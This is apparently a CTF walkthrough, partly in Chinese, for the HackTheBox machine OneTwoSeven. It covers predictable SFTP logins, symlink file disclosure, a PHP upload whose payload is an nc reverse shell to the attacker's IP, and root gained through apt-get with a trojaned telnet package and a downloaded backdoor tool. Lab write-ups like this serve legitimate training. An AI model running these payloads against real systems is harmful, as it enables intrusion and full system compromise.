Information Gathering

$ ip='10.10.10.133'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0) | ssh-hostkey: | 256 32b7f3e26dac943e6f11d805b9695845 (ECDSA) |_ 256 355204dc32691ab7527606e36c171ead (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Page moved. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Predicting Logins

http://10.10.10.133/index.php

http://10.10.10.133/signup.php

# echo '10.10.10.133 onetwoseven.htb'>>/etc/hosts

$ sftp ots-zNWZlMDQ@10.10.10.133

a335fe04

ots-zNWZlMDQ
a335fe04

$ for hash in md5; do echo -n 10.10.16.27 | ${hash}sum; done

用户密码是用户IP的md5前8个字符

用户名是md5后的base64截取

$ for hash in md5; do echo -n "${hash}: ";echo -n 10.10.16.27 | ${hash}sum | base64 -w0; echo; done

猜测local用户密码

$ echo ots-echo -n "127.0.0.1" | md5sum| base64|cut -c4-11``

ots-yODc2NGQ

$ echo -n "127.0.0.1" | md5sum| cut -c-8

f528764d

$ sftp ots-yODc2NGQ@10.10.10.133

User.txt

a479fec775507b7018411c9dba84a7d6

SFTP Symlinks && SWP recover

sftp> symlink /etc/passwd passwd

$ curl 'http://onetwoseven.htb/~ots-yODc2NGQ/passwd'

sftp> symlink / root.

http://onetwoseven.htb/~ots-yODc2NGQ/root./

$ wget http://onetwoseven.htb/~ots-yODc2NGQ/root./var/www/html-admin/.login.php.swp

$ vim -r .login.php.swp

ots-admin
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8

Homesweethome1

SSH only forward && OTS Addon Manager && virtual parameter bypass

$ ssh -N -D 1090 ots-yODc2NGQ@10.10.10.133

-N不执行远程命令，只是建立 SSH 连接并保持端口转发。

http://127.0.0.1:60080/

http://127.0.0.1:60080/menu.php?addon=addons/ots-man-addon.php

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /login.php"); }; if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); }; # OneTwoSeven Admin Plugin # OTS Addon Manager switch (true) { # Upload addon to addons folder. case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']): if(isset($_FILES['addon'])){ $errors= array(); $file_name = basename($_FILES['addon']['name']); $file_size =$_FILES['addon']['size']; $file_tmp =$_FILES['addon']['tmp_name']; if($file_size > 20000){ $errors[]='Module too big for addon manager. Please upload manually.'; } if(empty($errors)==true) { move_uploaded_file($file_tmp,$file_name); header("Location: /menu.php"); header("Content-Type: text/plain"); echo "File uploaded successfull.y"; } else { header("Location: /menu.php"); header("Content-Type: text/plain"); echo "Error uploading the file: "; print_r($errors); } } break; # Download addon from addons folder. case preg_match('/\/addon-download.php/',$_SERVER['REQUEST_URI']): if ($_GET['addon']) { $addon_file = basename($_GET['addon']); if ( file_exists($addon_file) ) { header("Content-Disposition: attachment; filename=$addon_file"); header("Content-Type: text/plain"); readfile($addon_file); } else { header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404); die(); } } break; default: echo "The addon manager must not be executed directly but only via<br>"; echo "the provided RewriteRules:<br><hr>"; echo "RewriteEngine On<br>"; echo "RewriteRule ^addon-upload.php addons/ots-man-addon.php [L]<br>"; echo "RewriteRule ^addon-download.php addons/ots-man-addon.php [L]<br><hr>"; echo "By commenting individual RewriteRules you can disable single<br>"; echo "features (i.e. for security reasons)<br><br>"; echo "<font size='-2'>Please note: Disabling a feature through htaccess leads to 404 errors for now.</font>"; break; } ?> 

1.检查当前请求的 URL 是否包含 /addons/。如果包含，脚本会直接停止执行 (die())，阻止用户直接访问 /addons/ 目录。这个保护措施有助于避免插件管理器被直接访问。
2.检测 URL 是否包含 /addon-upload.php.如果插件文件 (addon) 被上传，代码会检查文件的大小。如果文件超过了 20KB（20000 字节），则显示错误信息并提示用户手动上传,如果没有错误，插件文件将被上传并移动到当前目录下（move_uploaded_file()），然后重定向到 menu.php 并显示上传成功的信息。
3.如果 URL 包含 /addon-download.php，则会检查 GET 请求中是否有 addon 参数。如果有，代码会尝试从服务器上查找对应的插件文件。如果文件存在，使用 readfile() 输出文件内容并触发浏览器下载插件文件。

文件不存在规则匹配失败/addon-upload.php

通过已存在的/addon-download.php进一步添加虚拟参数进入/addon-upload.php方法

POST /addon-download.php?a=/addon-upload.php/ HTTP/1.1 Host: 127.0.0.1:60080 Content-Length: 293 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:60080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryphFWTRQZGfBr7typ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1:60080/menu.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=utv3fif568kneancj1ra4t3904 Connection: close ------WebKitFormBoundaryphFWTRQZGfBr7typ Content-Disposition: form-data; name="addon"; filename="1.php" Content-Type: application/x-php GTF89A <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f');?> ------WebKitFormBoundaryphFWTRQZGfBr7typ-- 

Privilege Escalation：apt-get && DNS hijack && http_proxy && Tyrant

www-admin-data@onetwoseven:/etc/apt$ cat sources.list.d/onetwoseven.list

解析packages.onetwoseven.htb到Arch主机

arch# echo '10.10.16.27 packages.onetwoseven.htb'>>/etc/hosts

arch$ pip install --upgrade proxy.py

arch$ proxy --hostname 0.0.0.0 --port 10000

www-admin-data$ export http_proxy=http://10.10.16.27:10000

搜索当前存在的包

www-admin-data@onetwoseven:/etc/apt$ dpkg -l | head -20

ii telnet 0.17-41 amd64

arch$ wget http://ftp.de.debian.org/debian/pool/main/n/netkit-telnet/telnet_0.17-42_amd64.deb

arch$ dpkg-deb -R telnet_0.17-42_amd64.deb evil_deb

arch$ vim ./evil_deb/DEBIAN/postinst

添加/tmp/tyrant

arch$ dpkg-deb -b ./evil_deb/ telnet_0.17-42_amd64.deb

获取服务端的telnet Packages 数据信息

www-admin-data$ cat /var/lib/apt/lists/de.deb.devuan.org_merged_dists_ascii_main_binary-amd64_Packages | grep -A 18 "Package: telnet$"

获取evil deb的哈希

arch$ ls -la telnet_0.17-42_amd64.deb;md5sum telnet_0.17-42_amd64.deb; sha256sum telnet_0.17-42_amd64.deb

09c8645d8775a4ea3e2e2a9d4cafabdc telnet_0.17-42_amd64.deb a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73 telnet_0.17-42_amd64.deb 

创建文件Packages

Package: telnet Version: 0.17-42 Installed-Size: 157 Maintainer: Mats Erik Andersson <mats.andersson@gisladisker.se> Architecture: amd64 Replaces: netstd Provides: telnet-client Depends: netbase, libc6 (>= 2.15), libstdc++6 (>= 5) Description: basic telnet client Description-md5: 80f238fa65c82c04a1590f2a062f47bb Source: netkit-telnet Tag: admin::login, interface::shell, network::client, protocol::ipv6, protocol::telnet, role::program, uitoolkit::ncurses, use::login Section: net Priority: standard Filename: pool/DEBIAN/main/n/netkit-telnet/telnet_0.17-42_amd64.deb Size: 71028 MD5sum: 09c8645d8775a4ea3e2e2a9d4cafabdc SHA256: a93b2287e52518446a4f8097a8a3a605e41a4242a8b9555c08b0d7b4c3f83e73 

arch$ gzip Packages -c > Packages.gz

www-admin-data@onetwoseven:/$ cat /var/lib/apt/lists/de.deb.devuan.org_merged_dists_ascii-updates_Release | head -15 Origin: Devuan Label: Devuan Suite: stable-updates Version: 2.0.0 Codename: ascii-updates Date: Sun, 25 Aug 2019 20:46:02 UTC Architectures: amd64 arm64 armel armhf i386 ppc64el Components: main contrib non-free SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 contrib/binary-armhf/Packages 0ba877606ba38ef307382bf2cf41b991c248499f9d549e1224d493258e6f2fea 949 main/debian-installer/binary-i386/Packages.gz e167af9851b8226953161338dadf89d089402e1a39dfd8859a684311f09c00a5 29 contrib/binary-armel/Packages.gz 4cadad0c317172a52bf4e1cac8c9f2627c72d54764c1b756def196b513cef5cc 29 non-free/debian-installer/binary-amd64/Packages.gz cc826c85a01b615920b39ed0eb995a09354452ec6bfe8a41e2887f697e8ab57f 29 contrib/binary-amd64/Packages.gz e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 non-free/binary-all/Packages 

arch$ ls -l Packages*; sha256sum Packages*

2c0affea6242c314455189272c7755d261104a66426476e43121433173214516 Packages 8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3 Packages.gz 

创建文件Release

Origin: Devuan Label: Devuan Suite: stable Version: 2.0.0 Codename: ascii Date: Sun, 26 Aug 2019 00:46:02 UTC Architectures: amd64 arm64 armel armhf i386 ppc64el Components: main SHA256: 2c0affea6242c314455189272c7755d261104a66426476e43121433173214516 697 main/binary-amd64/Packages 8fec70cc6b2d80ad6bb874acb975e32134d81614b70080213b6826aaf58789a3 493 main/binary-amd64/Packages.gz 

arch$ mkdir -p devuan/dists/ascii/main/binary-amd64/
arch$ mkdir -p devuan/pool/DEBIAN/main/n/netkit-telnet/

arch$ cp telnet_0.17-42_amd64.deb devuan/pool/DEBIAN/main/n/netkit-telnet/

arch$ cp Release devuan/dists/ascii/

arch$ cp Packages devuan/dists/ascii/main/binary-amd64/

arch$ cp Packages.gz devuan/dists/ascii/main/binary-amd64/

arch$ python3 -m http.server 80

arch$ proxy --hostname 0.0.0.0 --port 10000

www-admin-data$ wget https://github.com/MartinxMax/Tyrant/releases/download/version-2.0/tyrant

www-admin-data$ sudo /usr/bin/apt-get update

www-admin-data$ sudo /usr/bin/apt-get upgrade

Tyrant成功注入到系统

www-admin-data@onetwoseven:/tmp$ ./tyrant -uid 0 -rhost 10.10.16.27 -rport 10031

Root.txt

7a5b069b4c8ce1ecb5990d58d64939ba

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）